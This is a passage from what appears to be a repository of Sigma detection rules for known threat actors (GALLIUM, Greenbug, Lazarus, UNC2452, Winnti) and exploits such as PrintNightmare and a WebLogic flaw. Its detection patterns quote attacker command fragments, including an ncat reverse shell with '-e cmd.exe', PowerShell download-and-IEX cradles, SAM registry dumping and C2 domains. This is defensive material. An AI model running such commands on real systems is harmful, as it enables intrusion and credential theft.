    "content": "title: GALLIUM Artefacts - Builtin\nid: 3db10f25-2527-4b79-8d4b-471eb900ee29\nrelated:\n    - id: 440a56bf-7873-4439-940a-1c8a671073c2\n      type: derived\nstatus: test\ndescription: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.\nreferences:\n    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)\nauthor: Tim Burrell\ndate: 2020-02-07\nmodified: 2023-01-02\ntags:\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1071\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: dns-server-analytic\n    definition: 'Requirements: Microsoft-Windows-DNS-Server/Analytical ({EB79061A-A566-4698-9119-3ED2807060E7}) Event Log must be collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 257\n        QNAME:\n            - 'asyspy256.ddns.net'\n            - 'hotkillmail9sddcc.ddns.net'\n            - 'rosaf112.ddns.net'\n            - 'cvdfhjh1231.myftp.biz'\n            - 'sz2016rose.ddns.net'\n            - 'dffwescwer4325.myftp.biz'\n            - 'cvdfhjh1231.ddns.net'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml",
    "content": "title: Greenbug Espionage Group Indicators\nid: 3711eee4-a808-4849-8a14-faf733da3612\nstatus: test\ndescription: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-20\nmodified: 2023-03-09\ntags:\n    - attack.g0049\n    - attack.execution\n    - attack.t1059.001\n    - attack.command-and-control\n    - attack.t1105\n    - attack.defense-evasion\n    - attack.t1036.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - ':\\ProgramData\\adobe\\Adobe.exe'\n            - ':\\ProgramData\\oracle\\local.exe'\n            - '\\revshell.exe'\n            - '\\infopagesbackup\\ncat.exe'\n            - ':\\ProgramData\\comms\\comms.exe'\n    selection_msf:\n        CommandLine|contains|all:\n            - '-ExecutionPolicy Bypass -File'\n            - '\\msf.ps1'\n    selection_ncat:\n        CommandLine|contains|all:\n            - 'infopagesbackup'\n            - '\\ncat'\n            - '-e cmd.exe'\n    selection_powershell:\n        CommandLine|contains:\n            - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'\n            - '-nop -w hidden -c $k=new-object'\n            - '[Net.CredentialCache]::DefaultCredentials;IEX '\n            - ' -nop -w hidden -c $m=new-object net.webclient;$m'\n            - '-noninteractive -executionpolicy bypass whoami'\n            - '-noninteractive -executionpolicy bypass netstat -a'\n    selection_other:\n        CommandLine|contains: 'L3NlcnZlcj1'  # base64 encoded '/server='\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml",
    "content": "title: Lazarus Group Activity\nid: 24c4d154-05a4-4b99-b57d-9b977472443a\nrelated:\n    - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e\n      type: obsolete\nstatus: test\ndescription: Detects different process execution behaviors as described in various threat reports on Lazarus group activity\nreferences:\n    - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/\n    - https://www.hvs-consulting.de/lazarus-report/\nauthor: Florian Roth (Nextron Systems), wagga\ndate: 2020-12-23\nmodified: 2023-03-10\ntags:\n    - attack.g0032\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_generic:\n        CommandLine|contains:\n            - 'reg.exe save hklm\\sam %temp%\\~reg_sam.save'\n            - '1q2w3e4r@#$@#$@#$'\n            - ' -hp1q2w3e4 '\n            - '.dat data03 10000 -p '\n    selection_netstat:\n        CommandLine|contains|all:\n            - 'netstat -aon | find '\n            - 'ESTA'\n            - ' > %temp%\\~'\n    # Network share discovery\n    selection_network_discovery:\n        CommandLine|contains|all:\n            - '.255 10 C:\\ProgramData\\IBM\\'\n            - '.DAT'\n    selection_persistence:\n        CommandLine|contains|all:\n            - ' /c '\n            - ' -p 0x'\n        CommandLine|contains:\n            - 'C:\\ProgramData\\'\n            - 'C:\\RECYCLER\\'\n    selection_rundll32:\n        CommandLine|contains|all:\n            - 'rundll32 '\n            - 'C:\\ProgramData\\'\n        CommandLine|contains:\n            - '.bin,'\n            - '.tmp,'\n            - '.dat,'\n            - '.io,'\n            - '.ini,'\n            - '.db,'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Leviathan/registry_event_apt_leviathan.yml",
    "content": "title: Leviathan Registry Key Activity\nid: 70d43542-cd2d-483c-8f30-f16b436fd7db\nstatus: test\ndescription: Detects registry key used by Leviathan APT in Malaysian focused campaign\nreferences:\n    - https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign\nauthor: Aidan Bracher\ndate: 2020-07-07\nmodified: 2023-09-19\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd'\n    condition: selection\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/README.md",
    "content": "# SolarWinds’ Orion Supply Chain\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml",
    "content": "title: UNC2452 Process Creation Patterns\nid: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f\nstatus: test\ndescription: Detects specific process creation patterns used by UNC2452, as provided by Microsoft in the form of Microsoft Defender ATP queries\nreferences:\n    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-22\nmodified: 2024-09-12\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\n    # - sunburst\n    # - unc2452\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # To avoid writing a complex condition, \"selection_generic_1\" and \"selection_generic_2\" are the same except for the extension used.\n    selection_generic_1:\n        CommandLine|contains:\n            - '7z.exe a -v500m -mx9 -r0 -p'\n            - '7z.exe a -mx9 -r0 -p'\n        CommandLine|contains|all:\n            - '.zip'\n            - '.txt'\n    selection_generic_2:\n        CommandLine|contains:\n            - '7z.exe a -v500m -mx9 -r0 -p'\n            - '7z.exe a -mx9 -r0 -p'\n        CommandLine|contains|all:\n            - '.zip'\n            - '.log'\n    selection_generic_3:\n        ParentCommandLine|contains|all:\n            - 'wscript.exe'\n            - '.vbs'\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - 'C:\\Windows'\n            - '.dll,Tk_'\n    selection_generic_4:\n        ParentImage|endswith: '\\rundll32.exe'\n        ParentCommandLine|contains|all:\n            - 'C:\\Windows'\n            - '.dll'\n        CommandLine|contains: 'cmd.exe /C '\n    selection_generic_5:\n        ParentImage|endswith: '\\rundll32.exe'\n        Image|endswith: '\\dllhost.exe'\n        CommandLine: ''\n    condition: 1 of selection_generic_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml",
    "content": "title: UNC2452 PowerShell Pattern\nid: b7155193-8a81-4d8f-805d-88de864ca50c\nstatus: test\ndescription: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware\n    - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-20\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1047\n    - detection.emerging-threats\n    # - sunburst\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'Invoke-WMIMethod win32_process -name create -argumentlist'\n            - 'rundll32 c:\\windows'\n    selection_cli_2:\n        CommandLine|contains|all:\n            - 'wmic /node:'\n            - 'process call create \"rundll32 c:\\windows'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml",
    "content": "title: Suspicious VBScript UNC2452 Pattern\nid: 20c3f09d-c53d-4e85-8b74-6aa50e2f1b61\nstatus: test\ndescription: Detects suspicious inline VBScript keywords as used by UNC2452\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-05\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'Execute'\n            - 'CreateObject'\n            - 'RegRead'\n            - 'window.close'\n            - '\\Microsoft\\Windows\\CurrentVersion'\n    filter:\n        CommandLine|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/web_solarwinds_supernova_webshell.yml",
    "content": "title: Solarwinds SUPERNOVA Webshell Access\nid: a2cee20b-eacc-459f-861d-c02e5d12f1db\nstatus: test\ndescription: Detects access to SUPERNOVA webshell as described in Guidepoint report\nreferences:\n    - https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/\n    - https://www.anquanke.com/post/id/226029\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-12-17\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-uri-query|contains|all:\n            - 'logoimagehandler.ashx'\n            - 'clazz'\n    selection2:\n        cs-uri-query|contains: 'logoimagehandler.ashx'\n        sc-status: 500\n    condition: selection1 or selection2\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml",
    "content": "title: TAIDOOR RAT DLL Load\nid: d1aa3382-abab-446f-96ea-4de52908210b\nstatus: test\ndescription: Detects specific process characteristics of Chinese TAIDOOR RAT malware load\nreferences:\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-30\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1055.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'dll,MyStart'\n            - 'dll MyStart'\n    selection2a:\n        CommandLine|endswith: ' MyStart'\n    selection2b:\n        CommandLine|contains: 'rundll32.exe'\n    condition: selection1 or ( selection2a and selection2b )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml",
    "content": "title: Winnti Malware HK University Campaign\nid: 3121461b-5aa0-4a41-b910-66d25524edbb\nstatus: test\ndescription: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities\nreferences:\n    - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/\nauthor: Florian Roth (Nextron Systems), Markus Neis\ndate: 2020-02-01\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.g0044\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        ParentImage|contains:\n            - 'C:\\Windows\\Temp'\n            - '\\hpqhvind.exe'\n        Image|startswith: 'C:\\ProgramData\\DRM'\n    selection2:\n        ParentImage|startswith: 'C:\\ProgramData\\DRM'\n        Image|endswith: '\\wmplayer.exe'\n    selection3:\n        ParentImage|endswith: '\\Test.exe'\n        Image|endswith: '\\wmplayer.exe'\n    selection4:\n        Image: 'C:\\ProgramData\\DRM\\CLR\\CLR.exe'\n    selection5:\n        ParentImage|startswith: 'C:\\ProgramData\\DRM\\Windows'\n        Image|endswith: '\\SearchFilterHost.exe'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml",
    "content": "title: Winnti Pipemon Characteristics\nid: 73d70463-75c9-4258-92c6-17500fe972f2\nstatus: stable\ndescription: Detects specific process characteristics of Winnti Pipemon malware reported by ESET\nreferences:\n    - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/\nauthor: Florian Roth (Nextron Systems), oscd.community\ndate: 2020-07-30\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.g0044\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains: 'setup0.exe -p'\n    selection_2:\n        CommandLine|contains: 'setup.exe'\n        CommandLine|endswith:\n            - '-x:0'\n            - '-x:1'\n            - '-x:2'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate setups that use similar flags\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/av_exploit_cve_2021_34527_print_nightmare.yml",
    "content": "title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection\nid: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561\nstatus: stable\ndescription: Detects the suspicious file that is created from PoC code against the Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare) and CVE-2021-1675.\nreferences:\n    - https://twitter.com/mvelazco/status/1410291741241102338\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527\nauthor: Sittikorn S, Nuttakorn T, Tim Shelton\ndate: 2021-07-01\nmodified: 2023-10-23\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.emerging-threats\n    - cve.2021-34527\n    - cve.2021-1675\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        Filename|contains: ':\\Windows\\System32\\spool\\drivers\\x64\\'\n    keywords:\n        - 'File submitted to Symantec' # symantec fp, pending analysis, more generic\n    condition: selection and not keywords\nfalsepositives:\n    - Unlikely, or pending PSP analysis\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/file_delete_win_exploit_cve_2021_1675_print_nightmare.yml",
    "content": "title: Potential PrintNightmare Exploitation Attempt\nid: 5b2bbc47-dead-4ef7-8908-0cf73fcbecbf\nstatus: test\ndescription: Detects DLL deletions from the Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675\nreferences:\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://github.com/cube0x0/CVE-2021-1675\nauthor: Bhabesh Raj\ndate: 2021-07-01\nmodified: 2023-02-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574\n    - cve.2021-1675\n    - detection.emerging-threats\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\spoolsv.exe'\n        TargetFilename|contains: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_exploit_cve_2021_1675_printspooler.yml",
    "content": "title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern\nid: 2131cfb3-8c12-45e8-8fa0-31f5924e9f07\nstatus: test\ndescription: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675\nreferences:\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare\n    - https://github.com/cube0x0/CVE-2021-1675\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-06-29\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.resource-development\n    - attack.t1587\n    - cve.2021-1675\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\123'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/image_load_exploit_cve_2021_1675_spoolsv_dll_load.yml",
    "content": "title: Windows Spooler Service Suspicious Binary Load\nid: 02fb90de-c321-4e63-a6b9-25f4b03dfd14\nstatus: test\ndescription: |\n    Detects DLL loads from the Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare).\nreferences:\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://github.com/ly4k/SpoolFool\nauthor: FPT.EagleEye, Thomas Patzke (improvements)\ndate: 2021-06-29\nmodified: 2022-06-02\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574\n    - cve.2021-1675\n    - cve.2021-34527\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\spoolsv.exe'\n        ImageLoaded|contains:\n            - '\\Windows\\System32\\spool\\drivers\\x64\\3\\'\n            - '\\Windows\\System32\\spool\\drivers\\x64\\4\\'\n        ImageLoaded|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Loading of legitimate driver\nlevel: informational\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/registry_event_cve_2021_1675_mimikatz_printernightmare_drivers.yml",
    "content": "title: PrinterNightmare Mimikatz Driver Name\nid: ba6b9e43-1d45-4d3c-a504-1043a64c8469\nstatus: test\ndescription: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527\nreferences:\n    - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760\n    - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n    - https://nvd.nist.gov/vuln/detail/cve-2021-1675\n    - https://nvd.nist.gov/vuln/detail/cve-2021-34527\nauthor: Markus Neis, @markus_neis, Florian Roth\ndate: 2021-07-04\nmodified: 2023-06-12\ntags:\n    - attack.execution\n    - attack.t1204\n    - cve.2021-1675\n    - cve.2021-34527\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810\\'\n            - '\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz'\n    selection_alt:\n        TargetObject|contains|all:\n            - 'legitprinter'\n            - '\\Control\\Print\\Environments\\Windows'\n    selection_print:\n        TargetObject|contains:\n            - '\\Control\\Print\\Environments'\n            - '\\CurrentVersion\\Print\\Printers'\n    selection_kiwi:\n        TargetObject|contains:\n            - 'Gentil Kiwi'\n            - 'mimikatz printer'\n            - 'Kiwi Legit Printer'\n    condition: selection or selection_alt or (selection_print and selection_kiwi)\nfalsepositives:\n    - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml",
    "content": "title: Possible CVE-2021-1675 Print Spooler Exploitation\nid: 4e64668a-4da1-49f5-a8df-9e2d5b866718\nstatus: test\ndescription: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675\nreferences:\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare\n    - https://twitter.com/fuzzyf10w/status/1410202370835898371\nauthor: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w, Tim Shelton\ndate: 2021-06-30\nmodified: 2022-11-15\ntags:\n    - attack.execution\n    - attack.t1569\n    - cve.2021-1675\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: printservice-admin\ndetection:\n    selection:\n        EventID: 808\n        ErrorCode:\n            - '0x45A'\n            - '0x7e'\n    keywords:\n        - 'The print spooler failed to load a plug-in module'\n        # default file names used in PoC codes\n        - 'MyExploit.dll'\n        - 'evil.dll'\n        - '\\addCube.dll'\n        - '\\rev.dll'\n        - '\\rev2.dll'\n        - '\\main64.dll'\n        - '\\mimilib.dll'\n        - '\\mimispool.dll'\n    falsepositive:\n        - ' registration timed out' # ex: The print spooler failed to load a plug-in module PrintConfig registration timed out\n    condition: (selection or keywords) and not falsepositive\nfalsepositives:\n    - Problems with printer drivers\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml",
    "content": "title: CVE-2021-1675 Print Spooler Exploitation\nid: f34d942d-c8c4-4f1f-b196-22471aecf10a\nstatus: test\ndescription: Detects driver load events in the print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675\nreferences:\n    - https://twitter.com/MalwareJake/status/1410421967463731200\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-01\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1569\n    - cve.2021-1675\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: printservice-operational\ndetection:\n    selection:\n        EventID: 316\n    keywords:\n        - 'UNIDRV.DLL, kernelbase.dll, '\n        - ' 123 '\n        - ' 1234 '\n        - 'mimispool'\n    condition: selection and keywords\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml",
    "content": "title: CVE-2021-1675 Print Spooler Exploitation IPC Access\nid: 8fe1c584-ee61-444b-be21-e9054b229694\nstatus: test\ndescription: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527\nreferences:\n    - https://twitter.com/INIT_3/status/1410662463641731075\nauthor: INIT_6\ndate: 2021-07-02\nmodified: 2022-10-05\ntags:\n    - attack.execution\n    - attack.t1569\n    - cve.2021-1675\n    - cve.2021-34527\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName: 'spoolss'\n        AccessMask: '0x3'\n        ObjectType: 'File'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/zeek_dce_rpc_exploit_cve_2021_1675_printnightmare_print_driver_install.yml",
    "content": "title: Possible PrintNightmare Print Driver Install - CVE-2021-1675\nid: 7b33baef-2a75-4ca3-9da4-34f9a15382d8\nrelated:\n    - id: 53389db6-ba46-48e3-a94c-e0f2cefe1583\n      type: derived\nstatus: stable\ndescription: |\n    Detects the remote installation of a print driver, which is a possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\n    The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and/or through group policy.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29\n    - https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527\n    - https://github.com/corelight/CVE-2021-1675\n    - https://old.zeek.org/zeekweek2019/slides/bzar.pdf\n    - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/\nauthor: '@neu5ron (Nate Guagenti)'\ndate: 2021-08-23\nmodified: 2025-11-03\ntags:\n    - attack.execution\n    - cve.2021-1678\n    - cve.2021-1675\n    - cve.2021-34527\n    - detection.emerging-threats\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    selection:\n        operation:\n            - 'RpcAsyncInstallPrinterDriverFromPackage' # \"76f03f96-cdfd-44fc-a22c-64950a001209\",0x3e\n            - 'RpcAsyncAddPrintProcessor' # \"76f03f96-cdfd-44fc-a22c-64950a001209\",0x2c\n            - 'RpcAddPrintProcessor' # \"12345678-1234-abcd-ef00-0123456789ab\",0x0e\n            - 'RpcAddPrinterDriverEx' # \"12345678-1234-abcd-ef00-0123456789ab\",0x59\n            - 'RpcAddPrinterDriver' # \"12345678-1234-abcd-ef00-0123456789ab\",0x09\n            - 'RpcAsyncAddPrinterDriver' # \"76f03f96-cdfd-44fc-a22c-64950a001209\",0x27\n    condition: selection\nfalsepositives:\n    - Legitimate remote alteration of a printer driver.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-20090/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml",
    "content": "title: Arcadyan Router Exploitations\nid: f0500377-bc70-425d-ac8c-e956cd906871\nstatus: test\ndescription: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.\nreferences:\n    - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n    - https://www.tenable.com/security/research/tra-2021-13\n    - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild\nauthor: Bhabesh Raj\ndate: 2021-08-24\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-20090\n    - cve.2021-20091\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    path_traversal:\n        # CVE-2021-20090 (Bypass Auth: Path Traversal)\n        cs-uri-query|contains: '..%2f'\n    config_file_inj:\n        cs-uri-query|contains|all:\n            # Chaining of CVE-2021-20090 (Bypass Auth) and CVE-2021-20091 (Config File Injection)\n            - '..%2f'\n            - 'apply_abstract.cgi'\n    noauth_list:\n        cs-uri-query|contains:\n            - '/images/'\n            - '/js/'\n            - '/css/'\n            - '/setup_top_login.htm'\n            - '/login.html'\n            - '/loginerror.html'\n            - '/loginexclude.html'\n            - '/loginlock.html'\n    condition: (path_traversal or config_file_inj) and noauth_list\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-2109/web_cve_2021_2109_weblogic_rce_exploit.yml",
    "content": "title: Oracle WebLogic Exploit CVE-2021-2109\nid: 687f6504-7f44-4549-91fc-f07bab065821\nstatus: test\ndescription: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109\nreferences:\n    - https://twitter.com/pyn3rd/status/1351696768065409026\n    - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw\nauthor: Bhabesh Raj\ndate: 2021-01-20\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - cve.2021-2109\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - 'com.bea.console.handles.JndiBindingHandle'\n            - 'ldap://'\n            - 'AdminServer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-21972/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml",
